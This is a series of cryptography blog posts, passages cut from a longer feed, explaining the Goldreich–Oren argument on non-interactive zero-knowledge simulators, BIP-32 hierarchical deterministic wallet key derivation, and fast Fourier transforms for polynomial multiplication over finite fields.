way, given a string $ s $ to tell whether it is the output of such simulator $ S(x) $ or an original proof transcript created by the prover $ P $ and the verifier $ V $. This bascially means that if someone else gives you a transcript from a ZK-proof interaction between a prover and a verifier, you can’t just believe him! This transcript could have been faked using such a simulator!
The idea of the proof by Goldreich and Oren goes like this: If a NIZK proof-system exists (and we know it does) it also has a simulator $ S(x) $. The output of the simulator should look just like the interaction between the prover and the verifier. However, since this is non-interactive proof system, the whole transcript is just a single message sent from the prover to the verifier. So, the simulator should be able to create such transcripts which are composed only by a single message from the prover to the verifier without being given a valid proof. But, if it does so, doesn’t it mean that the simulator actually is able to create valid proofs for $ x $? After all, the whole transcript is just the proof itself, unlike transcripts for interactive proof systems, and if a randomized, efficient algorithm can create proofs for it, then the problem for which we have created the proof system is in $ BPP $.
That’s pretty much it, without getting into the mathematical notation and rigorous definitions used by Goldreich and Oren.
As you can see, this “loophole” exploited in the proof can only exist in the case of non-interactive proof systems, where the transcript of the simulator is also a valid proof! This all means that being interactive gives a lot of power to such interactive zero knowledge proof systems and only because this interactivity lacks in NIZK we need some extra information to create a simulator. Typically the CRS contains information referred to as “simulation trapdoor”, because it gives the simulator some degrees of freedom on deciding the contents of the CRS to allow it to create such proofs without yielding valid proofs, like what happened in the proof when we didn’t have the CRS.
That’s all for this time!
]]>Some cryptography based applications (such as cryptocurrencies) rely on the secure storage and usage of some secret, known as a cryptographic key. With more and more applications these days that make use of cryptography (especially as part of permissionless blockchains), users are required to maintain an increasing number of keys. Storing each key separately can cause a lot of mess and pain so instead another approach can be considered. We can have a single “seed” (which must be kept secret!) with which we can derive a large number of seeminly “random” keys. To keep keys organized, this derivation mechanism can be hierarchical, for example from this single seed we can want to be able to derivate multiple “sub-seeds”. Each of these sub-seeds will be used to derive cryptographic keys for a different application (for example a different cryptocurrency). You can also think of another hierarchy level where each of these “application-subseeds” will derivate verious “account-subseeds” so you can even have multiple accounts for each application. While the semantics here can change depending on the exact use case, the core idea is that from a single key, we want to deterministically derive large quantities of secrets in a hierarchical fashion. The terms “seed” or “subseed” will be substituted with just the term “key” for convenience.
These srtuctures are usually referred to as HD-wallets, since their most popular use case is for cryptocurrencies’ wallets. In this post we will see how can this hierarchical structure is generated and the different flavors of HD-wallets with their respective security considerations.
In this post I will assume that the reader is at least somewhat familiar with elliptic-curve public-key cryptography.
First, let’s go over how HD wallets work, for exact definitions please refer to BIP-32.
Since we are trying to create a hierarchical structure, we can think of all the keys generated by this mechanism to be part of this hierarchy. Hierarchical structures usually visualized using trees. The single “seed” will be the root of the tree and each key from it derived can be used to the derive all the keys in its subtree. For example, consider the following figure:
Figure 1: An Example of a Key Derivation Tree
Starting from a key $k_0$ (the root of the tree, what we originally referred to as a “seed”) we can derive multiple keys $(k_1,k_2,k_3)$. These keys can also be used to derive even more keys, for example, in the figure $k_1$ was used to derive keys $k_4,k_5$. We also use the term “subkey” to tell that one key was derived from another, for instance $k_4$ is subkey number 1 of $k_1$ and $k_3$ is subkey number 2 of $k_0$. We will also use the $k[i]$ notation to denote the $i^{th}$ subkey of key $k$.
So far I’ve used the term “key” in a vague manner, this is because both private and public keys can be considered for this use case. While the scenario of a private key seems more “natural” (so the owner of a single key can generate as many addresses as he wants), the scenario of deriving public keys can also be useful. Let’s consider a real life example: Your favorite coffee shop decided to start accepting Bitcoin. To make an order, the customer is standing in front of a touch screen, selecting his drink from the menu and hitting the “Payment” button. At this point the machine has to present the client a unique payment address. We don’t want two clients to use the same payment address because it would be much more complicated to distinguish between payments of different clients. Instead, the machine is able to generate a fresh address for each order and present it to the customer. However, we don’t the machine to be able to derive the matching private keys as well as it would impose a security risk. So, the machine will be able to derive the public addresses to which customers pay but the owner of the store will be able to derive (in the same manner) the matching private keys which will be used to redeem the paid funds.
Notice that the public keys generated by the payment terminal should correspond to the private keys generated by the owner of the store.
So lets think of $f$ as the function generating subkeys, therefore, one could generate the $i^{th}$ subkey of a key $K$ using $f(K,i)$. However, this doesn’t work so naively, because if we have a private key $k$ and public key $K=k\cdot G$ for some elliptic-curve base-point $G$, we want that the $i^{th}$ private key generated by $k$ and the $i^{th}$ public-key generated by $K$ would match. In other words, $f(K,i) = f(k,i)\cdot G$. How can we construct $f$ to satisfy the property?
So, BIP-32, the standard for HD-wallets that was initially used by Bitcoin and later adopted by many other systems, solves to problem in an elegant manner. A public key $K$ can derive its $i^{th}$ subkey ($K[i]$) using (The “$||$” operator is concatenation): \(K[i] = K + h(K || i)\cdot G\)
Where $h $ is some hash function with sufficiently large output domain, so if we use the secp256k1 curve, like BIP-32, we need $h$ to yield at least 256-bits of pseudorandom output.
Now given a private key $k$ we can derive its $i^{th}$ subkey ($k[i]$) using: \(k[i] = k + h((k\cdot G) || i)\) Notice that since we know the private key $k$, we can compute the match public key $K=k\cdot G$ (used inside $h$). Now we can see that: \(\begin{align} k[i]\cdot G &= (k + h((k\cdot G) || i))\cdot G \\ &= k\cdot G + h((k\cdot G) || i)\cdot G \\ &= K + h(K || i)\cdot G \\ &= K[i] \end{align}\)
And we got the desired property that a private key and the matching public key will yield matching private keys and public keys.
It will, therefore, take you by no surprise the private key $k$ can derive its subkeys and also the subkeys of its matching public key $K$.
Well, as you might have noticed there is a subtle issue here which some could find as a security bug. Let’s see what is the difference between two consecutive private subkeys $k[1] $ and $k[2]$ for instance: \(\begin{align} k[2] - k[1] &= (k + h(K || 2)) - (k + h(K || 1) \\ &= h(K||2) - h(K||1) \end{align}\)
So, the difference between two consecutive private subkeys only depends on the public key, which isn’t supposed to be considered a secret! So if someone is given one of the subkeys $k[1]$ and the public key (which is, well … public!), then the next subkey can be computed using
\[k[2] = k[1] + h(K || 2) - h(K || 1)\]This, indeed, is a problem in some scenarios and therefore another notion of hardening was introduced. So far, the non-hardened HD-key-derivation was introduced, in which the difference between consecutive private/public keys can be computed using the public key alone. In the hardened version the $i^{th}$ private subkey of a private key $k$ is computed as: \(k[i] = k + h(k || i)\)
This makes the derivation more secure, in the sense that now the parent private key has to be compromised to compute the difference between consecutive private keys. However, given the matching public key of $K=k\cdot G$, one cannot compute the $K[i]$ in the hardened version, because $K[i] = K + h(k||i)\cdot G$ and the private key $k$ isn’t known to those who wish to derive only public keys!
In short hardened key derivation can only be used by knowing the parent private key. Therefore, in some scenarios, hardened key derivation isn’t applicable, for example, the touch screen in the coffee shop from the beginnig of the post.
Ok, so we’re almost done, but there is one last caveat before you can tell everyone that you really know BIP-32. The thing is that we don’t want necessarily everyone to be able to derive keys. That is, if we use non-hardened key derivation, we can’t assume the public keys of the parents aren’t public, because these are public keys after all! So, in order to derive keys we may want the derivation to depend not only the public keys (in non-hardened mode) or the private keys (in hardened mode) but also on another source of entropy, which is known as chain codes. A little bit more formally, the derivation function $h$ will take not only the key $K/k$ and the index $i$ but also another input $c$, the chain code, so only those who know the chain code can derive the subkey. And to separate the chain code from the key/index we will use an HMAC function $h(k,M)$ instead of simply a hash function. We will also want that each key will be derived alongside a fresh chain code, therefore, we will use $h$ of double the output size (for example, for secp256k1 keys we will use $h$ with 512 bits of output), where the first half of the output (denoted $h_L$) will be used to derive the new chain code and the second half of the output (denoted $h_R$) will be used to derive the key. For a given key $K$ we will denote the $i^{th}$ generated chain code using $c_K[i]$.
So we get the following formulas:
Non Hardened | Hardened | |
---|---|---|
Public Key | \(\begin{aligned}K[i]&=K+h_R(c,K|i)\\ c_K[i] &= h_L(c,K|i)\end{aligned}\) | X |
Private Key | \(\begin{aligned}k[i]&=K+h_R(c,(k\cdot G)|i)\\ c_k[i] &= h_L(c,(k\cdot G)|i)\end{aligned}\) | \(\begin{aligned}k[i]&=k+h_R(c,k|i)\\ c_k[i] &= h_L(c,k|i)\end{aligned}\) |
One last note about chain-codes is that they are not mandatory and we can have done great without them. Either using them or not using them only depends on the security assumptions one it willing to make specifically about the secrecy of public-keys that can derive additional children.
That’s it! At this point you should pretty much know how BIP-32 is used and works. Notice that some technical aspects weren’t discussed:
For these and other technical details, please refer to BIP-32.
]]>While reading please remember that FFTs are a gigantic topic with lots of cool caveats, algorithms and use-cases. This post only intends to be merely an introductory to this topic. If you have further questions about this post or if you find this topic interesting and want to discuss about it or general aspects of crypto, feel free to reach out on Telegram or on Twitter.
Polynomials are a very interesting algebraic construct. In particular they have many use cases in cryptography such as SNARKs/STARKs, Shamir-Secret-Sharing see my post about it, Ring-LPN and more. It’s 100% ok if you don’t know any of those buzzwords, I will not assume any prior knowledge about them. The only point here is that polynomials are very useful.
A quick recap on what are polynomials. A function $P(x)$ is a polynomial if it can be expressed using the following algebraic term:
\[P(x) = \sum_{i=0}^{n}a_ix^i\]For some non-negative integer $n$ and a set of $n+1$ numbers $a_0,a_1,\ldots,a_n$. In this post we will sometimes write only $P$ instead of $P(x)$ since all polynomials we will talk about are of a single variable, typically $x$.
Generally speaking, the elements $a_0,\ldots,a_n$ are elements of some field. In this article we will primarily focus on finite fields and thus assume this field to be a finite field of some prime size $\mathbb{Z}/p\mathbb{Z}$.
The degree of a polynomial is the largest index $i$ such that $a_i \neq 0$. For a polynomial $P(x)$ we denote its degree using $\deg{(P)}$. In the edge-case where $P(x)=0$, all coefficients are zero we say that the $\deg{(P)}=\infty$.
Let $P(x)=\sum_{i=0}^{n}p_ix^i$ and $Q(x)=\sum_{i=0}^nq_ix^i$ be two polynomials of degree $n$ (so $p_n\neq 0$ and $q_n \neq 0$).
One thing we can do with $P,Q$ is adding them. So, the sum of $P$ and $Q$ is:
\[Q+P = \sum_{i=0}^{n}(p_i+q_i)x^i\]In terms of computational complexity, the addition of two degree-$n$ polynomials takes $\mathcal{O}(n)$ field operations. In other words, the amount of time it take to add two degree-$n$ polynomials is linear in the degree of the polynomial. This is because, as the formula suggests, there are $n+1$ coefficients in the results polynomial and each coefficient can be computed with a single addition of two field elements.
We can also multiply $P$ and $Q$ by each other. But when it comes to multiplication, things get a little bit more complicated. The product of $P$ and $Q$ is:
\[Q \cdot P = \sum_{i=0}^{n}\sum_{j=0}^{n}p_iq_jx^{i+j}\]First, notice that the degree of the resulting polynomial is $2n$, so by multiplying we get a polynomial of a higher degree.
As this formula suggests the multiplication takes $\mathcal{O}(n^2)$ time, this is because for each of the $n+1$ coefficients of $P$ we multiply it by each of the coefficients of $Q$, thus performing as many as $(n+1)\cdot(n+1)$ field multiplications. We also along the process make $\mathcal{O}(n^2)$ field additions to sum the $n^2$ field multiplication results.
As some of you may find it more appealing, we can also write the multiplication as:
\[Q \cdot P = \sum_{i=0}^{2n}x^i\sum_{j=0}^{i}p_jq_{i-j}\]This is because the coefficient of $x^i$ in the resulting polynomial is the inner sum: $\sum_{j=0}^{i}p_jq_{i-j}$.
So, $\mathcal{O}(n^2)$ is nice, but can we do better? I mean, imagine if $P,Q$ are of degree of $10^9$. It would be infeasible to multiply them!
At this point you’re probably wondering what all these have to do with FFTs. But don’t worry, I promised FFTs, and FFTs you will get. We’re getting there slowly but surely.
Recall the “unique-interpolation-theorem” I’ve discussed in a previous post of mine. This theorem claims that for each set of $n+1$ pairs of points ${(x_0,y_0),\ldots,(x_n,y_n)}$ such that for all $i \neq j$ we have $x_i \neq x_j$ there is a unique polynomial $P(x)$ of degree at most $n$ such that $P(x_i)=y_i$ for all $0\leq i\leq n$.
So far, to represent a polynomial $P$ of degree $n$, we used a set of $n+1$ coefficients $(p_0,…,p_n)$ such that $P(x)=\sum_{i=0}^n p_ix^i$. We call this the coefficient representation. The term represent means that using the given constraints, or information, we can uniquely identify a specific polynomial of degree $n$ who satisfies these constraints.
However, we can think of another way to represent a polynomial. Consider a fixed set of $n+1$ points $(x_0,…,x_n)$. To represent $P$ we can take the evaluations of $P$ at these points $P(x_0),…,P(x_n)$. From the “unique-interpolation-theorem” $P(x)$ is the only polynomial of degree $\leq n$ with the given evaluations at the given points. We call this evaluation representation. In other words the evaluation representation of a polynomial $P(x)$ of degree $\leq n$ is its evaluation on a set of predetermined points $(x_0,…,x_n)$
Now let’s say we’re given two polynomials $P(x),Q(x)$ of degree $\leq n$ and we want to compute their addition $S(x)=P(x)+Q(x)$, and let’s assume both input polynomials are represented using the evaluation representation. We know that for each $x_0,…,x_n$ the following equation holds:
\[S(x_i) = P(x_i) + Q(x_i)\]So adding two polynomials represented by their evaluations only takes $n$ field operations (additions) by simply adding the evaluations at the respective evaluation points.
As for multiplying $P(x)$ and $Q(x)$ the following equation also holds:
\[S(x_i) = P(x_i) \cdot Q(x_i)\]So to multiply two polynomials we only have to perform $n$ field operations (multiplications) in the evaluation-representation. This is because after the the point-wise multiplication we will have the evaluation of polynomial $S$ over the set of points ${x_i}$. This is exactly the evaluation-representation of $S$. This is much faster than multiplying two polynomials using coefficient-representation.
Given a polynomial $P(x)$ of degree $\leq n$ represented in the coefficient-representation. How long does it take to change its representation into the evaluation-representation over some points $(x_0,…,x_n)$?
We can do this by sequentially evaluating $P(x_i)$ for each $x_i$. Since each evaluation takes up to $n+1$ additions and $n+1$ multiplications, the evaluation of $n+1$ points takes $\mathcal{O}(n^2)$ time.
The opposite direction, in which we take a polynomial represented in the evaluation-representation and compute its coefficient-representation would take $\mathcal{O}(n^2)$ as well using the Lagrange-Interpolation algorithm (I have described it in a previous post).
As mentioned, the schoolbook algorithm to multiply two polynomials (in the coefficient representation) takes $\mathcal{O}(n^2)$. With our previous observation, however, we can think of another algorithm to multiply two degree $\leq n$ polynomials. In our new algorithm we take the polynomials, evaluate them over $2n+1$ points, multiply the evaluations and interpolate the evaluations to obtain the coefficients of the product-polynomial. For completeness the algorithm is given here:
Input: Two degree $\leq n$ polynomials $P(x)=\sum_{i=0}^np_ix^i$ and $Q(x)=\sum_{i=0}^nq_ix^i$.
Output: A polynomial $S(x)=\sum_{i=0}^{2n}s_ix^i$ of degree $\leq 2n$.
- Select arbitrary $2n+1$ points $x_0,…,x_{2n+1}$.
- Compute ${\bf P}=(P(x_0),…,P(x_{2n+1}))$ and ${\bf Q}=(Q(x_0),…,Q(x_{2n+1}))$.
- Compute ${\bf S}=(P(x_0)\cdot Q(x_0),…,P(x_{2n+1})\cdot Q(x_{2n+1}))$.
- Interpolate ${\bf S}$ to create a polynomial $S(x)$ of degree $\leq 2n$.
Let’s see how much time each step of the algorithm takes:
So, overall, our new algorithm takes $\mathcal{O}(n^2)$ time, just like the old algorithm. Not too bad.
Our current bottleneck of the algorithm is changing the representation of the polynomial back and forth between coefficient and evaluation representations. If only we could do those faster, our multiplication algorithm will be faster overall.
Remember we have chosen the evaluation points $(x_0,…,x_n)$ of our evaluation-representation 100% arbitrarily. What if these points weren’t chosen arbitrarily? Are there specific points with which we can change representations faster?
Well, apparently the answer is yes! and this is exactly where Fast-Fourier-Transforms (FFTs) come to the rescue.
Just like polynomials are defined over a specific field, so are FFTs. The field can be either a finite field (e.g. $\mathbb{Z}/p\mathbb{Z}$, the finite field of prime size $p$) or infinite (e.g. $\mathbb{C}$, the field of complex numbers), but it has to be a field.
FFTs can be used to change the representation of a polynomial $P(x)$ of degree $\lt n$ with coefficients in some field $F$ from coefficients-representation to evaluation-representation (and vice-versa) where the evaluation is given specifically over $n$ unique field elements who are $n^{\text th}$ roots of unity.
So what are roots of unity?
We begin with a definition.
Definition [root of unity]: Let $r$ be a field element of some field and let $i$ be an integer. We say that $r$ is a root of unity of order $i$ (or $i^\text{th}$ root of unity) if $r^i \equiv 1\quad (\text{mod}\ p)$. The power and equivalence in the equation follow the finite field arithmetic.
So ROUs are, as their name suggest, roots of the unit element of the field. Let’s have an example. Consider $\mathbb{Z}/5\mathbb{Z}$ the finite field with 5 elements ${0,1,2,3,4}$ with modulo-5 addition and multiplication. Now, let’s look at the powers of the field element $e=2$.
\[\begin{align} e^1 &= 2 \\ e^2 &= 4 \\ e^3 &= 3 \\ e^4 &= 1 \\ \end{align}\]Now, since $e^4=1$ it is a root of unity of order 4.
Great, now let’s consider another element, say $4$. We know that $e^2=4$ and thus,
\[4^2 = (e^2)^2 = e^4 = 1\]So 4 is a root of unity of order 2. However, since $4^2 = 1$ we can also tell that 4 is a root of unity of order 4, because:
\[4^4 = (4^2)^2 = 1^2 = 1\]In fact, we can prove an even deeper theorem about roots-of-unity:
Theorem: Let $r$ be a root of unity of order $i$, then $r$ is also a root of unity for all $n$ such that $i|n$ ($i$ divides $n$).
The proof is very straight forward, since $i|n$ we can write $n=k\cdot i$ for some integer $k$. Now we can prove that $r$ is a ROU of order $n$ by showing that $r^n = 1$, which is exactly the case because:
\[r^n = r^{ik} = (r^i)^k = 1 ^k = 1\]Notice that $r^i = 1$ because we assumed $r$ is a ROU of order $i$.
From this observation we define a special kind of ROUs which are primitive-roots-unity:
Definition [primitive root of unity]: Let $r$ be a field element and let $i$ be an integer. We say that $r$ is a primitive root of unity (PROU) of order $i$ if $r$ is a root of unity of order $i$ but isn’t a root of unity of order $j$ for any $1 \lt j \lt i$.
Following this definition we can tell that $2$ is a PROU of order 4, because $2^4 = 1$ but $2^1, 2^2, 2^3$ are all not equal to $1$ However, $4$ is not a PROU of order 4, because even though $4^4 = 1$ we also have $4^2 = 1$.
Another way to think about ROUs and PROUs is through the order of elements.
Definition [order of an element]: Given a non-zero field element $e$, the order of $e$ is the smallest positive integer $k$ such that $e^k = 1$. We denote the order $e$ as $\text{ord}(e)$.
Therefore, an element $e$ is $k^{\text th}$-PROU if $\text{ord}(e)=k$.
Ok, so now that we know a little about roots of unity, you are probably wondering, what do they have to do with FFTs? We have already said that FFTs can be thought of as an algorithm to quickly change the representation of a polynomial of degree $\lt n$ from coefficient-representation to evaluation-representation and vice-versa where the evaluation is computed over $n$ points who are $n^{\text th}$ roots of unity.
Let’s give a more explicit definition for FFTs.
Let $n$ be a number and let’s assume we have a field element $g$ such that $\text{ord}(g)=n$, so $g$ is $n^{\text th}$ PROU. The FFT algorithm takes $n$ points: $x_0,…,x_{n-1}$ and computes new $n$ points $X_0,…,X_{n-1}$ such that:
\[X_k = \sum_{i=0}^{n-1}x_i\cdot g^{ki}\]To make the definition more straightforward, we can think of a polynomial $P(e)=\sum x_i\cdot e^i$. (Notice - $P$ is a function of $e$!) And define:
\[X_k = P(g^k)\]So, we compute $X_0,…,X_{n-1}$ as the evaluations of $P(e)$ on the powers of a $n^{\text th}$ PROU $g$, which are $g^0,g^1,…,g^{n-1}$. Notice that this usage of $P$ perfectly aligns with our theory about FFTs and their use cases so far. The coefficients of $P$ are the given $x_0,…,x_{n-1}$ and we use the FFT to obtain the evaluations of the $n^{th}$-ROUs on $P$, which are exactly $X_0,…,X_{n-1}$.
In this context we usually call $n$ the size of the FFT.
There are various algorithms to compute FFTs and we will try and focus on the most basic one, also known as the Cooley-Tuckey Algorithm (CT) which was invented by Gauss and rediscovered independently in the 1960s by Cooley and Tuckey.
At its core, the CT algorithm computes an FFT of size $n$ where $n$ is a product of many small primes. It is common to call such numbers smooth-numbers. For example $n=2^{13}$ is a smooth-number. $n=2^7\cdot 3^5\cdot 11^3$ is also a smooth number, but $n=67,280,421,310,721 \cdot 524,287$ is not smooth however. So CT can also work for non-smooth sizes of FFTs, but it’s getting really efficient only for such smooth sizes. In other words, the smoother the size of the FFT is, the bigger the advantage of the CT algorithm over the traditional $\mathcal{O}(n^2)$ algorithm.
In the rest of this section I’ll try to first give some informal sense behind the core idea of the CT algorithm. Next, I’ll give the explicit algorithm for both the FFT and the inverse FFT in the spirit of CT.
Let $\mathbb{Z}/p\mathbb{Z}$ be a finite field of prime size $p$. Let $n$ be a number dividing $p-1$ and let $P(x)$ be a polynomial of degree at most $n-1$ over $\mathbb{Z}/p\mathbb{Z}$. We are given the coefficient-representation of $P$, so $P(x)=\sum_{i=0}^{n-1}a_ix^i$ where $a_0,…,a_{n-1}$ are all elements of the field $\mathbb{Z}/p\mathbb{Z}$.
Since $n$ is dividing $p-1$ we have a $n^{\text th}$-PROU, denote it with $g$. So $g^i \neq 1$ for $1\leq i \leq {n-1}$ and $g^n = 1$. Let’s assume that $n$ is smooth, in particular that $n=2^k$ for some integer $k$, so $n$ is a power of two.
We can write the polynomial $P(x)$ as follows:
\[\begin{align} P(x) &= \sum_{i=0}^{n-1}a_ix^i \\ &= \overbrace{\sum_{i=0}^{n/2-1}a_{2i}x^{2i}}^{\text{even-index terms}}&+\overbrace{\sum_{i=0}^{n/2-1}a_{2i+1}x^{2i+1}}^{\text{ odd-index terms}}\\ &= \underbrace{\sum_{i=0}^{n/2-1}a_{2i}(x^{2})^i}_{P_0(x^2)}&+x\underbrace{\sum_{i=0}^{n/2-1}a_{2i+1}(x^{2})^i}_{P_1(x^2)}\\ &= P_0(x^2)+x\cdot P_1(x^2) \end{align}\]So we can express $P(x)$ using $P_0(x^2)$ and $P_1(x^2)$ where $P_0,P_1$ are polynomials (and a little multiplication by $x$). Let’s write those polynomials explicitly, we replace the $x^2$ term with a $y$ so $P_0(y),P_1(y)$ will be our polynomials.
\[\begin{align} P_0(y) &= \sum_{i=0}^{n/2-1}a_{2i}y^i & \text{and}\quad & P_1(y) &= \sum_{i=0}^{n/2-1}a_{2i+1}y^i \end{align}\]The following figure visualizes the reduction step for a polynomial of degree $8$:
The degree of each polynomial is less than half the degree of the original polynomial, so we have expressed the problem of evaluating a polynomial, by the problem of evaluating two polynomials of half the degree (and some extra linear-time processing to multiply $P_1(x^2)$ by the remaining $x$ term), right?
Well no, not yet. The original problem was evaluating a degree $\lt n$ polynomial $P(x)$ over the $n$-ROUs in $\mathbb{Z}_p$ ($g_0,…,g^{n-1}$). Our new two polynomials still have to be evaluated over $n$ points and not over $n/2$ points!
To reduce the number of points we should evaluate we add another observation as follows. Notice that in expressing $P(x)=P_0(x^2)+x\cdot P_1(x^2)$ we evaluate both $P_0$ and $P_1$ on $x^2$ and not on $x$. Originally we were evaluating $P(x)$ where $x$ is $n^{\text th}$-ROU, so by squaring it $x^2$ is now a $(n/2)^{\text th}$-ROU. Since there are only $n/2$ ROUs of order $n/2$, we have to make only $n/2$ evaluations on $P_0$ and $P_1$.
So, to evaluate $P(x)$ where $x$ is $n^{\text th}$-ROU we take the evaluation of $x^2$, a $(n/2)^{\text th}$-ROU, over both $P_0$ and add it to the evaluation of $P_1$ on $x^2$, multiplied by $x$. In conclusion, to evaluate $P(x)$ over $n$ ROUs of order $n$, we have to:
For completeness, notice that in the end of the recursion, if the FFT size is $1$ then $P(x)$ is of degree so $P(x)=c$ for some field element $c$, and thus the evaluation of it on a single point is exactly $c$.
To summarize, our FFT algorithm goes as follows:
Input
Output
Algorithm
If $n=1$ return $[c_0]$, because our polynomial is of degree $\lt 1$, so it’s degree . Therefore the coefficient $c_0$ is the evaluation of $P(g^0)$.
Split $P(x)$ into two polynomials:
Compute, recursively, the evaluations of $P_0(x),P_1(x)$ on the $n/2$ powers of $g^2$, a PROU of order $n/2$.
Let ${\bf S},{\bf T}$ be the arrays of legth $n/2$ containing of the evaluations of $P_0,P_1$ respectively from the recursive invocation. So ${\bf S}[i]=P_0((g^2)^i)$ and ${\bf T}[i]=P_1((g^2)^i)$. The polynomials $P_0,P_1$ satisfy: $P(x) = P_0(x^2) + x \cdot P_1(x^2)$.</li>
Let $T(n)$ denote the number of computational steps we have to perform over an FFT of size $n=2^k$. Since we have to solve a similar problem of size $n/2$ twice + $n$ additions and $n$ multiplications. So:
\[\begin{align} T(n) &= 2\cdot T(n/2) + 2n \\ &= 2\cdot \left(2\cdot T(n/4) + 2\cdot \frac{n}{2}\right) \\ &= 4\cdot T(n/4) + 4n \\ &= 4\cdot \left(2\cdot T(n/8) + 2\cdot \frac{n}{4}\right) \\ &= 8\cdot T(n/8) + 6n \\ &= ... \\ &=n \cdot T(1) + 2\cdot \log_2(n)\cdot n \\ &= \mathcal{O}(n\cdot \log_2(n)) \end{align}\]We devised a $\mathcal{O}(n\log(n))$ algorithm to change the representation of a polynomial from coefficient-representation to evaluation-representation of $n$ ROUs of order $n$. As we will explain next, the inverse FFT (from evaluation into coefficient representation) also takes $\mathcal{O}(n\log(n))$ and thus we will be able to multiply polynomials in $\mathcal{O}(n\log(n))$ time.
The Inverse-FFT (IFFT) algorithm, as its name suggests, simply reverts the operation of the original FFT algorithm. Namely, let $g$ be a $n^{\text{th}}$-PROU. The IFFT algorithm takes $P(g^0),P(g^1),…,P(g^{n-1})$, the evaluation-representation of some polynomial $P(x)$ of degree $\lt n$ and outputs the coefficient-representation $P(x)=\sum_{i=0}^{n-1}c_ix^i$.
In this section we’ll give an informal explanation about the IFFT algorithm. As we did with the FFT algorithm, we’ll assume for the sake of simplicity that $n$ is a smooth number, $n=2^k$. If we could find the coefficient representation of two polynomials $P_0$ and $P_1$ both of degree $\lt n/2$ such that:
\[P(x) = P_0(x^2) + x \cdot P_1(x^2)\]Then we could immediately derive the coefficient representation of $P$. Let’s see how its done.
If $P_0(y) = \sum_{i=0}^{n/2 -1} a_{i}y^i$ and $P_1(y)=\sum_{i=0}^{n/2 -1} b_iy^i$ then:
\[\begin{align} P(x) &= P_0(x^2) + x\cdot P_1(x^2) \\ &= \sum_{i=0}^{n/2-1}a_ix^{2i} + x \cdot \sum_{i=0}^{n/2-1}b_ix^{2i}\\ &= \sum_{i=0}^{n/2-1}(a_ix^{2i} + b_ix^{2i+1}) \end{align}\]Therefore, $c_{2i}$ the coefficient of $x^{2i}$ in $P(x)$ is $a_i$. Similarly, $c_{2i+1} = b_i$, the coefficient of $x^{2i+1}$ in $P(x)$. So, if we had the coefficient-representation of such $P_0, P_1$ we could obtain coefficient-representation of $P$.
At this point you’ve probably noticed already that this could be our recursive-step! We split the problem of obtaining the coefficient representation of a $\lt n$ degree polynomial into obtaining the polynomial representation of two $\lt n/2$ degree polynomials.
The only thing left to do then, is to translate the input of our original problem (evaluations of $P$ on all $n^{\text{th}}$-ROUs) into the inputs of our new, smaller, problems (evaluations of $P_0$ and $P_1$ on all $(n/2)^{\text{th}}$-ROUs).
We know (from the FFT algorithm) that polynomials $P_0,P_1$ of degree $\lt n/2$ exist such that $P(x)=P_0(x^2)+x\cdot P_1(x^2)$. Now, let $g$ be a $n^\text{th}$-PROU. And let $i$ be an integer in the range $\left[0,n/2\right)$. We have the following two equations obtained by setting $x=g^i$ and $x=g^{n/2+i}$ in the equation above:
\[\begin{align} P(g^i) &= P_0(g^{2i}) + g^i\cdot P_1(g^{2i}) \\ P(g^{n/2+i}) &= P_0(g^{2(n/2 +i)}) + g^{n/2+i}\cdot P_1(g^{2(n/2+i)}) \\ \end{align}\]Arranging the second equation a little bit we get:
\[\begin{align} P(g^i) &= P_0(g^{2i}) + g^i\cdot P_1(g^{2i}) \\ P(g^{n/2+i}) &= P_0(g^{n}g^{2i}) + g^{n/2}g^i\cdot P_1(g^{n}g^{2i}) \\ \end{align}\]Now, recall that $g$ is $n^\text{th}$-PROU so $g^n=1$ and $g^{n/2}=-1$. Substituting these two identities in the second equation, we get:
\[\begin{align} P(g^i) &= P_0((g^2)^i)) + g^i\cdot P_1((g^2)^i)) \\ P(g^{n/2+i}) &= P_0((g^2)^i) - g^i\cdot P_1((g^2)^i) \\ \end{align}\]This is looking good! Let’s see what we have:
So we have to solve a system of two equations with two variables. Solving it we get:
\[\begin{align} P_0((g^2)^i) &= \frac{P(g^i) + P(g^{n/2 +i})}{2} \\ P_1((g^2)^i) &= \frac{P(g^i) - P(g^{n/2 +i})}{2 g^i} \end{align}\]By solving this system of equations for all values of $i$ we get the $n/2$ evaluations of $P_0$ and $P_1$ of the powers of $g^2$ which is a PROU of order $n/2$.
This was the recursive step. The recursion ends when $P$ is of degree $\lt 1$, in that case $P$ is of degree 0. So $P(x)=c$ is a constant polynomial, and we are given its evaluation on power $g^0=1$. So we have $P(1)=c$ and therefore the evaluation itself is exactly the single coefficient of our polynomial.
Let’s try and write the algorithm:
Input
Output
Algorithm
Otherwise, compute arrays ${\bf S},{\bf T}$ of length $n/2$ such that: \(\begin{align} {\bf S}[i] &= \frac{ {\bf P}[i]+{\bf P}[n/2+i]}{2}\\ {\bf T}[i] &= \frac{ {\bf P}[i]-{\bf P}[n/2+i]}{2\cdot g^i} \end{align}\) These arrays are the evaluations of polynomials $P_0,P_1$ such that $P(x)=P_0(x^2)+x\cdot P_1(x^2)$ over the $n/2$ powers of $g^2$.
What if $n$ isn’t a power of 2? In both our FFT and inverse FFT we were expressing the input polynomial $P(x)$ using two polynomials $P_0,P_1$ such that:
\[P(x) = P_0(x^2)+x\cdot P_1(x^2)\]This was simple because the group of powers of $g$, our $n^\text{th}$-PROU could be split into pairs of elements $g^{i}$ and $g^{i+n/2}$ such that the squarings of both are equal to $g^{2i}$.
So, if $n$ isn’t a power of two, for example, $n=3\cdot m$, we can split the polynomial $P$ using three polynomials $P_0,P_1,P_2$ such that:
\[P(x) = P_0(x^3) + x\cdot P_1(x^3) + x^2 \cdot P_2(x^3)\]This will utilize the fact that the order of $g$ is a multiple of $3$ and therefore we could split the powers of $g$ into triplets $g^{i}, g^{n/3 +i}, g^{2n/3+1}$ such that cubing them (i.e. - raising them by the power of $3$) will yield $g^{3i}$.
We will also call the number of polynomials $P(x)$ was split into the split-factor of this recursive step. Notice that if $n$ has different prime factors we may use a different split-factor in each recursive step.
We stated at the beginning of the post that we prefer the case in which $n$ is smooth. Why is that? If you closely pay attention you’ll notice that step 5 of the FFT and step 2 of the IFFT are both taking $n\cdot s$ time where $n$ is the length of the input and $s$ is the split factor. For example, if the split factor is $3$ then each entry in the output of the FFT is computed using three evaluations, one from $P_0$ one from $P_1$ and one from $P_2$. Overall, we make $n \cdot 3$ operations.
